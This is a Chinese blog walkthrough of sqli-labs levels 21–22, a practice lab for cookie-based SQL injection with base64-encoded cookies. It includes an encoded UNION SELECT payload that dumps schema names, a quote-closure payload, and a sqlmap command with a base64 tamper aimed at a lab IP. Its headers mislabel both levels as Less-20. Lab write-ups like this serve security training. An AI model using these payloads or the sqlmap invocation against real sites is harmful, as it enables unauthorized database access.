sqli-labs第二十一二十二关

文章介绍了如何处理加密的Cookie注入问题,包括手动和自动化的解决方法。在Less-20关中,通过识别加密顺序(base64然后URL编码),尝试注入单引号并构造payload来绕过加密。对于自动化注入,使用sqlmap工具,调整参数以应对加密的Cookie值,进行数据库查询。

这两关还是cookie注入,但是cookie加密了。

Less-20(POST - Cookie Injection - base64 encoded quotes and parenthesis)

手工注入

和20关前面一样需要登入。

基础判断

很明显这里cookie加密了。我建议直接抓下包看看就可以。

我建议先直接吧加密信息直接放到burp的decoder模块直接跑一下看看。

这里我们发现他加密的顺序,先base64加密再进行url部分加密。接下来我们来解决一下闭合方式。

可以直接试试单引号(记得加密)

好因为cookie带单引号报错了,嘿嘿这就是单引号和括号闭合了。根据之前的知识构造一下payload。

查询数据库

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHNjaGVtYV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhICM%3d

接下来需要基础的注入知识就可以了。

sqli-labs第一二关_himobrinehacken的博客-优快云博客

自动化脚本注入

这里我就简单说下不一样的地方

sqlmap.py -u http://192.168.221.131/sqli/Less-21/ --cookie="uname = YWRtaW4="*  --threads=10 --batch --tamper=base64encode --level=5 --dbs

注意这里由于我们没有经过游览器解码,游览器传输数据是要url加密的,所以这里只需要解决网站加密问题就可以。(比较慢我就没有放下图片了)

这里有sqlmap的参数

https://www.processon.com/view/link/63edc0ce260d710715545868

Less-20(POST - Cookie Injection - base64 encoded quotes and parenthesis)

手工注入

和上一关一样,只是闭合方式改变了。

Iik%3d

自动化脚本注入

和上一关一样哦。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值